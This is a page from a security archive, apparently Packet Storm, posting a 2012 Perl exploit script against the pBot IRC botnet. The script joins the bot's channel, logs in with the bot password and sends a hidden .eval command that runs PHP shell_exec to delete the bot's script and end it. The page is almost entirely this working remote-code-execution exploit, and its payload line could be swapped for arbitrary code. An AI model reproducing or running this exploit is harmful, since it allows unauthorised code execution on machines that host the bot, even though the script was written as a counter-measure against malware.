all things security

pBot Remote Code Execution

pBot Remote Code Execution
Posted Jul 31, 2012
Authored by bwall

This perl script attacks pBot by leveraging a hidden .eval command to delete and kill the bot.

tags | exploit, perl
MD5 | c1cdb50ab422a8f2053d5be0a1f8b058

pBot Remote Code Execution

Change Mirror Download
#!/usr/bin/perl
# Exploit Title: pBot Remote Code Execution ("*" hostauth)
# Date: 31.07.2012
# Exploit Author: @bwallHatesTwits
# Software Link: https://www.firebwall.com/decoding/read.php?u=620d21fd31b87046e94975e03fdafa8a (decoded from attempted attack)
# Version: Various versions
# Tested on: Linux 3.2

use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;

my $nickname = "BotSlayer";
my $ident = "BotSlayer";
my $fullname = "BotSlayer";
$sel_client = IO::Select->new();

#configuration values from the bot source
$ircserver = "localhost"; #"server"
$ircserverpass = ""; #"pass"
my $ircport = "6667"; #"port"
#if "key" is set, then add a space and the password to the chan name
my @channels = ("#anonbxu"); #"chan" and "chan2"
$botPass = "hello"; #"password"
$botTrigger = "."; #"trigger"
#hostauth must be "*"
$loginCMD = "user"; #usually user or login

#payload - PHP code to run
#This version deletes the bots originating script, and dies
$phpEval = "shell_exec(\"rm -f \".\$_SERVER['SCRIPT_NAME']);exit();";

$channelCount = scalar(@channels);

sub onJoin
{
my $channel = shift;
$channel = substr($channel, 1);
print "Joined $channel\n";
say($channel, $botTrigger.$loginCMD." $botPass");
sleep(1);
say($channel, $botTrigger."eval \@BallastSec ".$phpEval);
print "Payload delivered\n";
tryQuit();
}

sub tryQuit
{
$channelCount--;
if($channelCount == 0)
{
quit("whomp wha");
}
}

sub sendraw
{
if ($#_ == '1')
{
my $socket = $_[0];
print $socket "$_[1]\n";
}
else
{
print $IRC_cur_socket "$_[0]\n";
}
}

sub conn
{
my $mynick = $_[0];
my $ircserver_con = $_[1];
my $ircport_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
if (defined($IRC_socket))
{
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_client->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
$irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
if($ircserverpass != "")
{
sendraw("PASS ".$ircserverpass);
}
sendraw("NICK ".$mynick);
sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");
sleep 1;
}
}

sub parse
{
my $servarg = shift;
print $servarg."\n";
if ($servarg =~ /^PING \:(.*)/)
{
sendraw("PONG :$1");
}
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) JOIN (.+)/)
{
my $channel = $4;
onJoin($channel);
}
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/)
{
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/)
{
notice("$pn", "\001VERSION BotSlayer by Ballast Security\001");
}
if ($args =~ /^(\Q$mynick\E|\!a)\s+(.*)/ )
{
my $natrix = $1;
my $arg = $2;
}
}
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i)
{
if (lc($1) eq lc($mynick))
{
$mynick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
}
}
elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i)
{
$mynick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach(@channels)
{
sendraw("JOIN $_");
}
}
}
my $line_temp;
while(1)
{
while (!(keys(%irc_servers)))
{
conn($nickname, $ircserver, $ircport);
}
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_client->can_read(0);
next unless(@ready);
foreach $fh (@ready)
{
$IRC_cur_socket = $fh;
$mynick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_client->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
$msg =~ s/\r\n$//;
for(my $c=0; $c<= $#lines; $c++)
{
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
parse("$line");
}
}
}

sub say
{
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}

sub notice
{
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}

sub join
{
sendraw("JOIN $_[0]");
}

sub part
{
sendraw("PART $_[0]");
}

sub quit
{
sendraw("QUIT :$_[0]");
exit;
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    15 Files
  • 2
    Oct 2nd
    16 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    11 Files
  • 6
    Oct 6th
    6 Files
  • 7
    Oct 7th
    2 Files
  • 8
    Oct 8th
    1 Files
  • 9
    Oct 9th
    13 Files
  • 10
    Oct 10th
    16 Files
  • 11
    Oct 11th
    15 Files
  • 12
    Oct 12th
    23 Files
  • 13
    Oct 13th
    13 Files
  • 14
    Oct 14th
    12 Files
  • 15
    Oct 15th
    2 Files
  • 16
    Oct 16th
    16 Files
  • 17
    Oct 17th
    16 Files
  • 18
    Oct 18th
    15 Files
  • 19
    Oct 19th
    10 Files
  • 20
    Oct 20th
    7 Files
  • 21
    Oct 21st
    4 Files
  • 22
    Oct 22nd
    2 Files
  • 23
    Oct 23rd
    16 Files
  • 24
    Oct 24th
    4 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close